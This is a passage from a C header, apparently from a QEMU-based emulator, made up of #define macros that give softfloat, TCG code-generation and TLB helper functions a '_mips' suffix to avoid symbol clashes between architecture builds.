float32_default_nan_mips #define float64_default_nan float64_default_nan_mips #define float128_default_nan float128_default_nan_mips #define float16_silence_nan float16_silence_nan_mips #define float32_silence_nan float32_silence_nan_mips #define float64_silence_nan float64_silence_nan_mips #define float16_squash_input_denormal float16_squash_input_denormal_mips #define float32_squash_input_denormal float32_squash_input_denormal_mips #define float64_squash_input_denormal float64_squash_input_denormal_mips #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mips #define roundAndPackFloatx80 roundAndPackFloatx80_mips #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mips #define int32_to_floatx80 int32_to_floatx80_mips #define int32_to_float128 int32_to_float128_mips #define int64_to_floatx80 int64_to_floatx80_mips #define int64_to_float128 int64_to_float128_mips #define uint64_to_float128 uint64_to_float128_mips #define float32_to_floatx80 float32_to_floatx80_mips #define float32_to_float128 float32_to_float128_mips #define float32_rem float32_rem_mips #define float32_exp2 float32_exp2_mips #define 
float32_log2 float32_log2_mips #define float32_eq float32_eq_mips #define float32_le float32_le_mips #define float32_lt float32_lt_mips #define float32_unordered float32_unordered_mips #define float32_eq_quiet float32_eq_quiet_mips #define float32_le_quiet float32_le_quiet_mips #define float32_lt_quiet float32_lt_quiet_mips #define float32_unordered_quiet float32_unordered_quiet_mips #define float64_to_floatx80 float64_to_floatx80_mips #define float64_to_float128 float64_to_float128_mips #define float64_rem float64_rem_mips #define float64_log2 float64_log2_mips #define float64_eq float64_eq_mips #define float64_le float64_le_mips #define float64_lt float64_lt_mips #define float64_unordered float64_unordered_mips #define float64_eq_quiet float64_eq_quiet_mips #define float64_le_quiet float64_le_quiet_mips #define float64_lt_quiet float64_lt_quiet_mips #define float64_unordered_quiet float64_unordered_quiet_mips #define floatx80_to_int32 floatx80_to_int32_mips #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mips #define floatx80_to_int64 floatx80_to_int64_mips #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mips #define floatx80_to_float32 floatx80_to_float32_mips #define floatx80_to_float64 floatx80_to_float64_mips #define floatx80_to_float128 floatx80_to_float128_mips #define floatx80_round floatx80_round_mips #define floatx80_round_to_int floatx80_round_to_int_mips #define floatx80_add floatx80_add_mips #define floatx80_sub floatx80_sub_mips #define floatx80_mul floatx80_mul_mips #define floatx80_div floatx80_div_mips #define floatx80_rem floatx80_rem_mips #define floatx80_sqrt floatx80_sqrt_mips #define floatx80_eq floatx80_eq_mips #define floatx80_le floatx80_le_mips #define floatx80_lt floatx80_lt_mips #define floatx80_unordered floatx80_unordered_mips #define floatx80_eq_quiet floatx80_eq_quiet_mips #define floatx80_le_quiet floatx80_le_quiet_mips #define floatx80_lt_quiet floatx80_lt_quiet_mips #define floatx80_unordered_quiet floatx80_unordered_quiet_mips #define float128_to_int32 float128_to_int32_mips #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mips #define float128_to_int64 float128_to_int64_mips #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mips #define float128_to_uint64 float128_to_uint64_mips #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_mips #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_mips #define float128_to_uint32 float128_to_uint32_mips #define float128_to_float32 float128_to_float32_mips #define float128_to_float64 float128_to_float64_mips #define float128_to_floatx80 float128_to_floatx80_mips #define float128_round_to_int float128_round_to_int_mips #define float128_add float128_add_mips #define float128_sub float128_sub_mips #define float128_mul float128_mul_mips #define float128_div float128_div_mips #define float128_rem float128_rem_mips #define float128_sqrt float128_sqrt_mips #define float128_eq float128_eq_mips #define float128_le float128_le_mips #define float128_lt float128_lt_mips #define float128_unordered float128_unordered_mips #define float128_eq_quiet float128_eq_quiet_mips #define float128_le_quiet float128_le_quiet_mips #define float128_lt_quiet float128_lt_quiet_mips #define float128_unordered_quiet float128_unordered_quiet_mips #define floatx80_compare floatx80_compare_mips #define floatx80_compare_quiet floatx80_compare_quiet_mips #define float128_compare float128_compare_mips #define 
float128_compare_quiet float128_compare_quiet_mips #define floatx80_scalbn floatx80_scalbn_mips #define float128_scalbn float128_scalbn_mips #define softfloat_init softfloat_init_mips #define tcg_optimize tcg_optimize_mips #define gen_new_label gen_new_label_mips #define tcg_can_emit_vec_op tcg_can_emit_vec_op_mips #define tcg_expand_vec_op tcg_expand_vec_op_mips #define tcg_register_jit tcg_register_jit_mips #define tcg_tb_insert tcg_tb_insert_mips #define tcg_tb_remove tcg_tb_remove_mips #define tcg_tb_lookup tcg_tb_lookup_mips #define tcg_tb_foreach tcg_tb_foreach_mips #define tcg_nb_tbs tcg_nb_tbs_mips #define tcg_region_reset_all tcg_region_reset_all_mips #define tcg_region_init tcg_region_init_mips #define tcg_code_size tcg_code_size_mips #define tcg_code_capacity tcg_code_capacity_mips #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_mips #define tcg_malloc_internal tcg_malloc_internal_mips #define tcg_pool_reset tcg_pool_reset_mips #define tcg_context_init tcg_context_init_mips #define tcg_tb_alloc tcg_tb_alloc_mips #define tcg_prologue_init tcg_prologue_init_mips #define tcg_func_start tcg_func_start_mips #define tcg_set_frame tcg_set_frame_mips #define tcg_global_mem_new_internal tcg_global_mem_new_internal_mips #define tcg_temp_new_internal tcg_temp_new_internal_mips #define tcg_temp_new_vec tcg_temp_new_vec_mips #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_mips #define tcg_temp_free_internal tcg_temp_free_internal_mips #define tcg_const_i32 tcg_const_i32_mips #define tcg_const_i64 tcg_const_i64_mips #define tcg_const_local_i32 tcg_const_local_i32_mips #define tcg_const_local_i64 tcg_const_local_i64_mips #define tcg_op_supported tcg_op_supported_mips #define tcg_gen_callN tcg_gen_callN_mips #define tcg_op_remove tcg_op_remove_mips #define tcg_emit_op tcg_emit_op_mips #define tcg_op_insert_before tcg_op_insert_before_mips #define tcg_op_insert_after tcg_op_insert_after_mips #define tcg_cpu_exec_time tcg_cpu_exec_time_mips #define tcg_gen_code tcg_gen_code_mips #define tcg_gen_op1 tcg_gen_op1_mips #define tcg_gen_op2 tcg_gen_op2_mips #define tcg_gen_op3 tcg_gen_op3_mips #define tcg_gen_op4 tcg_gen_op4_mips #define tcg_gen_op5 tcg_gen_op5_mips #define tcg_gen_op6 tcg_gen_op6_mips #define tcg_gen_mb tcg_gen_mb_mips #define tcg_gen_addi_i32 tcg_gen_addi_i32_mips #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_mips #define tcg_gen_subi_i32 tcg_gen_subi_i32_mips #define tcg_gen_andi_i32 tcg_gen_andi_i32_mips #define tcg_gen_ori_i32 tcg_gen_ori_i32_mips #define tcg_gen_xori_i32 tcg_gen_xori_i32_mips #define tcg_gen_shli_i32 tcg_gen_shli_i32_mips #define tcg_gen_shri_i32 tcg_gen_shri_i32_mips #define tcg_gen_sari_i32 tcg_gen_sari_i32_mips #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mips #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mips #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mips #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_mips #define tcg_gen_muli_i32 tcg_gen_muli_i32_mips #define tcg_gen_div_i32 tcg_gen_div_i32_mips #define tcg_gen_rem_i32 tcg_gen_rem_i32_mips #define tcg_gen_divu_i32 tcg_gen_divu_i32_mips #define tcg_gen_remu_i32 tcg_gen_remu_i32_mips #define tcg_gen_andc_i32 tcg_gen_andc_i32_mips #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_mips #define tcg_gen_nand_i32 tcg_gen_nand_i32_mips #define tcg_gen_nor_i32 tcg_gen_nor_i32_mips #define tcg_gen_orc_i32 tcg_gen_orc_i32_mips #define tcg_gen_clz_i32 tcg_gen_clz_i32_mips #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_mips #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_mips #define tcg_gen_ctzi_i32 
tcg_gen_ctzi_i32_mips #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_mips #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_mips #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_mips #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mips #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mips #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mips #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mips #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_mips #define tcg_gen_extract_i32 tcg_gen_extract_i32_mips #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_mips #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_mips #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mips #define tcg_gen_add2_i32 tcg_gen_add2_i32_mips #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_mips #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mips #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mips #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_mips #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mips #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mips #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_mips #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mips #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mips #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mips #define tcg_gen_smin_i32 tcg_gen_smin_i32_mips #define tcg_gen_umin_i32 tcg_gen_umin_i32_mips #define tcg_gen_smax_i32 tcg_gen_smax_i32_mips #define tcg_gen_umax_i32 tcg_gen_umax_i32_mips #define tcg_gen_abs_i32 tcg_gen_abs_i32_mips #define tcg_gen_addi_i64 tcg_gen_addi_i64_mips #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_mips #define tcg_gen_subi_i64 tcg_gen_subi_i64_mips #define tcg_gen_andi_i64 tcg_gen_andi_i64_mips #define tcg_gen_ori_i64 tcg_gen_ori_i64_mips #define tcg_gen_xori_i64 tcg_gen_xori_i64_mips #define tcg_gen_shli_i64 tcg_gen_shli_i64_mips #define tcg_gen_shri_i64 tcg_gen_shri_i64_mips #define tcg_gen_sari_i64 tcg_gen_sari_i64_mips #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mips #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_mips #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_mips #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_mips #define tcg_gen_muli_i64 tcg_gen_muli_i64_mips #define tcg_gen_div_i64 tcg_gen_div_i64_mips #define tcg_gen_rem_i64 tcg_gen_rem_i64_mips #define tcg_gen_divu_i64 tcg_gen_divu_i64_mips #define tcg_gen_remu_i64 tcg_gen_remu_i64_mips #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_mips #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_mips #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mips #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_mips #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_mips #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mips #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_mips #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_mips #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_mips #define tcg_gen_not_i64 tcg_gen_not_i64_mips #define tcg_gen_andc_i64 tcg_gen_andc_i64_mips #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_mips #define tcg_gen_nand_i64 tcg_gen_nand_i64_mips #define tcg_gen_nor_i64 tcg_gen_nor_i64_mips #define tcg_gen_orc_i64 tcg_gen_orc_i64_mips #define tcg_gen_clz_i64 tcg_gen_clz_i64_mips #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_mips #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_mips #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_mips #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_mips #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_mips #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_mips #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_mips #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_mips #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_mips #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_mips 
#define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_mips #define tcg_gen_extract_i64 tcg_gen_extract_i64_mips #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_mips #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_mips #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mips #define tcg_gen_add2_i64 tcg_gen_add2_i64_mips #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_mips #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_mips #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_mips #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_mips #define tcg_gen_smin_i64 tcg_gen_smin_i64_mips #define tcg_gen_umin_i64 tcg_gen_umin_i64_mips #define tcg_gen_smax_i64 tcg_gen_smax_i64_mips #define tcg_gen_umax_i64 tcg_gen_umax_i64_mips #define tcg_gen_abs_i64 tcg_gen_abs_i64_mips #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_mips #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_mips #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mips #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mips #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mips #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_mips #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_mips #define tcg_gen_exit_tb tcg_gen_exit_tb_mips #define tcg_gen_goto_tb tcg_gen_goto_tb_mips #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_mips #define check_exit_request check_exit_request_mips #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_mips #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mips #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mips #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mips #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_mips #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_mips #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_mips #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_mips #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_mips #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_mips #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_mips #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_mips #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_mips #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_mips #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_mips #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_mips #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_mips #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_mips #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_mips #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_mips #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_mips #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_mips #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_mips #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_mips #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_mips #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_mips #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_mips #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_mips #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_mips #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_mips #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_mips #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_mips 
#define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_mips #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_mips #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_mips #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_mips #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_mips #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_mips #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_mips #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_mips #define simd_desc simd_desc_mips #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_mips #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_mips #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_mips #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_mips #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_mips #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_mips #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_mips #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_mips #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_mips #define tcg_gen_gvec_2 tcg_gen_gvec_2_mips #define tcg_gen_gvec_2i tcg_gen_gvec_2i_mips #define tcg_gen_gvec_2s tcg_gen_gvec_2s_mips #define tcg_gen_gvec_3 tcg_gen_gvec_3_mips #define tcg_gen_gvec_3i tcg_gen_gvec_3i_mips #define tcg_gen_gvec_4 tcg_gen_gvec_4_mips #define tcg_gen_gvec_mov tcg_gen_gvec_mov_mips #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_mips #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_mips #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_mips #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_mips #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_mips #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_mips #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_mips #define tcg_gen_gvec_not tcg_gen_gvec_not_mips #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_mips #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_mips #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_mips #define tcg_gen_gvec_add tcg_gen_gvec_add_mips #define tcg_gen_gvec_adds tcg_gen_gvec_adds_mips #define tcg_gen_gvec_addi tcg_gen_gvec_addi_mips #define tcg_gen_gvec_subs tcg_gen_gvec_subs_mips #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_mips #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_mips #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_mips #define tcg_gen_gvec_sub tcg_gen_gvec_sub_mips #define tcg_gen_gvec_mul tcg_gen_gvec_mul_mips #define tcg_gen_gvec_muls tcg_gen_gvec_muls_mips #define tcg_gen_gvec_muli tcg_gen_gvec_muli_mips #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_mips #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_mips #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_mips #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_mips #define tcg_gen_gvec_smin tcg_gen_gvec_smin_mips #define tcg_gen_gvec_umin tcg_gen_gvec_umin_mips #define tcg_gen_gvec_smax tcg_gen_gvec_smax_mips #define tcg_gen_gvec_umax tcg_gen_gvec_umax_mips #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_mips #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_mips #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_mips #define tcg_gen_gvec_neg tcg_gen_gvec_neg_mips #define tcg_gen_gvec_abs tcg_gen_gvec_abs_mips #define tcg_gen_gvec_and tcg_gen_gvec_and_mips #define tcg_gen_gvec_or tcg_gen_gvec_or_mips #define tcg_gen_gvec_xor tcg_gen_gvec_xor_mips #define tcg_gen_gvec_andc tcg_gen_gvec_andc_mips #define tcg_gen_gvec_orc tcg_gen_gvec_orc_mips #define tcg_gen_gvec_nand tcg_gen_gvec_nand_mips #define tcg_gen_gvec_nor tcg_gen_gvec_nor_mips #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_mips 
#define tcg_gen_gvec_ands tcg_gen_gvec_ands_mips #define tcg_gen_gvec_andi tcg_gen_gvec_andi_mips #define tcg_gen_gvec_xors tcg_gen_gvec_xors_mips #define tcg_gen_gvec_xori tcg_gen_gvec_xori_mips #define tcg_gen_gvec_ors tcg_gen_gvec_ors_mips #define tcg_gen_gvec_ori tcg_gen_gvec_ori_mips #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_mips #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_mips #define tcg_gen_gvec_shli tcg_gen_gvec_shli_mips #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_mips #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_mips #define tcg_gen_gvec_shri tcg_gen_gvec_shri_mips #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_mips #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_mips #define tcg_gen_gvec_sari tcg_gen_gvec_sari_mips #define tcg_gen_gvec_shls tcg_gen_gvec_shls_mips #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_mips #define tcg_gen_gvec_sars tcg_gen_gvec_sars_mips #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_mips #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_mips #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_mips #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_mips #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_mips #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_mips #define vec_gen_2 vec_gen_2_mips #define vec_gen_3 vec_gen_3_mips #define vec_gen_4 vec_gen_4_mips #define tcg_gen_mov_vec tcg_gen_mov_vec_mips #define tcg_const_zeros_vec tcg_const_zeros_vec_mips #define tcg_const_ones_vec tcg_const_ones_vec_mips #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_mips #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_mips #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_mips #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_mips #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_mips #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_mips #define tcg_gen_dupi_vec tcg_gen_dupi_vec_mips #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_mips #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_mips #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_mips #define tcg_gen_ld_vec tcg_gen_ld_vec_mips #define tcg_gen_st_vec tcg_gen_st_vec_mips #define tcg_gen_stl_vec tcg_gen_stl_vec_mips #define tcg_gen_and_vec tcg_gen_and_vec_mips #define tcg_gen_or_vec tcg_gen_or_vec_mips #define tcg_gen_xor_vec tcg_gen_xor_vec_mips #define tcg_gen_andc_vec tcg_gen_andc_vec_mips #define tcg_gen_orc_vec tcg_gen_orc_vec_mips #define tcg_gen_nand_vec tcg_gen_nand_vec_mips #define tcg_gen_nor_vec tcg_gen_nor_vec_mips #define tcg_gen_eqv_vec tcg_gen_eqv_vec_mips #define tcg_gen_not_vec tcg_gen_not_vec_mips #define tcg_gen_neg_vec tcg_gen_neg_vec_mips #define tcg_gen_abs_vec tcg_gen_abs_vec_mips #define tcg_gen_shli_vec tcg_gen_shli_vec_mips #define tcg_gen_shri_vec tcg_gen_shri_vec_mips #define tcg_gen_sari_vec tcg_gen_sari_vec_mips #define tcg_gen_cmp_vec tcg_gen_cmp_vec_mips #define tcg_gen_add_vec tcg_gen_add_vec_mips #define tcg_gen_sub_vec tcg_gen_sub_vec_mips #define tcg_gen_mul_vec tcg_gen_mul_vec_mips #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_mips #define tcg_gen_usadd_vec tcg_gen_usadd_vec_mips #define tcg_gen_sssub_vec tcg_gen_sssub_vec_mips #define tcg_gen_ussub_vec tcg_gen_ussub_vec_mips #define tcg_gen_smin_vec tcg_gen_smin_vec_mips #define tcg_gen_umin_vec tcg_gen_umin_vec_mips #define tcg_gen_smax_vec tcg_gen_smax_vec_mips #define tcg_gen_umax_vec tcg_gen_umax_vec_mips #define tcg_gen_shlv_vec tcg_gen_shlv_vec_mips #define tcg_gen_shrv_vec tcg_gen_shrv_vec_mips #define tcg_gen_sarv_vec tcg_gen_sarv_vec_mips #define tcg_gen_shls_vec 
tcg_gen_shls_vec_mips #define tcg_gen_shrs_vec tcg_gen_shrs_vec_mips #define tcg_gen_sars_vec tcg_gen_sars_vec_mips #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_mips #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_mips #define tb_htable_lookup tb_htable_lookup_mips #define tb_set_jmp_target tb_set_jmp_target_mips #define cpu_exec cpu_exec_mips #define cpu_loop_exit_noexc cpu_loop_exit_noexc_mips #define cpu_reloading_memory_map cpu_reloading_memory_map_mips #define cpu_loop_exit cpu_loop_exit_mips #define cpu_loop_exit_restore cpu_loop_exit_restore_mips #define cpu_loop_exit_atomic cpu_loop_exit_atomic_mips #define tlb_init tlb_init_mips #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_mips #define tlb_flush tlb_flush_mips #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_mips #define tlb_flush_all_cpus tlb_flush_all_cpus_mips #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_mips #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_mips #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_mips #define tlb_flush_page tlb_flush_page_mips #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_mips #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_mips #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_mips #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_mips #define tlb_protect_code tlb_protect_code_mips #define tlb_unprotect_code tlb_unprotect_code_mips #define tlb_reset_dirty tlb_reset_dirty_mips #define tlb_set_dirty tlb_set_dirty_mips #define tlb_set_page_with_attrs tlb_set_page_with_attrs_mips #define tlb_set_page tlb_set_page_mips #define get_page_addr_code_hostp get_page_addr_code_hostp_mips #define get_page_addr_code get_page_addr_code_mips #define probe_access probe_access_mips #define tlb_vaddr_to_host tlb_vaddr_to_host_mips #define helper_ret_ldub_mmu helper_ret_ldub_mmu_mips #define helper_le_lduw_mmu helper_le_lduw_mmu_mips #define helper_be_lduw_mmu helper_be_lduw_mmu_mips #define helper_le_ldul_mmu helper_le_ldul_mmu_mips #define helper_be_ldul_mmu helper_be_ldul_mmu_mips #define helper_le_ldq_mmu helper_le_ldq_mmu_mips #define helper_be_ldq_mmu helper_be_ldq_mmu_mips #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mips #define helper_le_ldsw_mmu helper_le_ldsw_mmu_mips #define helper_be_ldsw_mmu helper_be_ldsw_mmu_mips #define helper_le_ldsl_mmu helper_le_ldsl_mmu_mips #define helper_be_ldsl_mmu helper_be_ldsl_mmu_mips #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_mips #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_mips #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_mips #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_mips #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_mips #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_mips #define cpu_ldub_data_ra cpu_ldub_data_ra_mips #define cpu_ldsb_data_ra cpu_ldsb_data_ra_mips #define cpu_lduw_data_ra cpu_lduw_data_ra_mips #define cpu_ldsw_data_ra cpu_ldsw_data_ra_mips #define cpu_ldl_data_ra cpu_ldl_data_ra_mips #define cpu_ldq_data_ra 